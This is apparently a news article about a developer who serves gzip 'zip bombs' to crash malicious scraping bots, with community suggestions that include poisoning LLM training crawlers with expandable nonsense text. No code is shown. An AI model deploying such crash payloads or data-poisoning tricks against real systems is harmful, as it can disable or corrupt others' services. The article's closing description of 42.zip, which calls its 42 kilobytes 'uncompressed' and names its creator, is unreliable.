Cyber pros are increasingly resorting to cyber guerrilla warfare to protect their servers. One blogger received much attention for the “zip bomb” tactic to fight scrapers and other malicious bots.
The web is filled with a plethora of unsophisticated crawlers, many of them malicious or unwelcome. To fight the barrage, software developer Ibrahim Diallo shared a seemingly effective method.
The “zip bomb” is like a booby trap for unwanted bots. When a server receives bots’ requests, it responds with a small (1-10MB) gzip-compressed file. However, the file decompresses into a much larger one that immediately crashes the bots that can't handle multi-gigabyte files.
That’s the intended goal – to overwhelm the bot’s system so it becomes unresponsive.
“I return a 200 OK response, and serve them a gzip response. I vary from a 1MB to 10MB file, which they are happy to ingest. For the most part, when they do, I never hear from them again,” Diallo shared in a blog post.
It works very well because gzip-compressed content is a common practice to save bandwidth and speed up loading times. Like many browsers, most bots accept gzip responses and decompress them automatically to read the page content.
However, their resources are limited.
“The file expands, and expands, and expands, until they run out of memory and their server crashes. The 1MB file decompresses into a 1GB. This is more than enough to break most bots. However, for those pesky scripts that won't stop, I serve them the 10MB file. This one decompresses into 10GB and instantly kills the script,” the developer said.
Diallo openly shared the instructions on how to create the zip bomb and even a simple code that acts as a middleware checking if the request is malicious, or the IP address is blacklisted. Everything can be done with just a few lines of code. However, the developer warns that there’s a risk of potentially crashing your own device.
Legitimate bots, like Googlebot, are well-engineered, clearly identify themselves, and follow strict protocols.
There’s still a risk that some legitimate user will be served a zip bomb. However, many browsers can handle or kill processes that require a 1 GB+ increase in RAM usage.
Intentionally sending data designed to crash another system raises some ethical considerations and is also not a foolproof solution. Zip bombs can be detected and circumvented.
Others jump on the bandwagon
On Monday, the “zip bomb” method became the most upvoted discussion on Lobste.rs, a computing-focused community for discussing technical content.
Some cyber pros said they have implemented the method. Others even suggested improvements, such as making it harder for bots to detect it, triggering the “zip bomb” after a certain number of requests, or poisoning content for AI bots.
“You should be able to use a small Markov chain to generate 1 KiB of random text and then random back references on word boundaries that expands to a few GiBs of nonsense text but uses only a few hundred KiBs of bandwidth. For extra fun, this will poison LLM training things by feeding them nonsense text,” one community member suggested.
The “zip bomb” method has been implemented in the past as a tool to exploit file decompression. A famous example of a “zip bomb” is a “42.zip” file crafted by David Fifield, which only contains 42 kilobytes of uncompressed data but expands to a staggering 4.5 petabytes when uncompressed.
Your email address will not be published. Required fields are markedmarked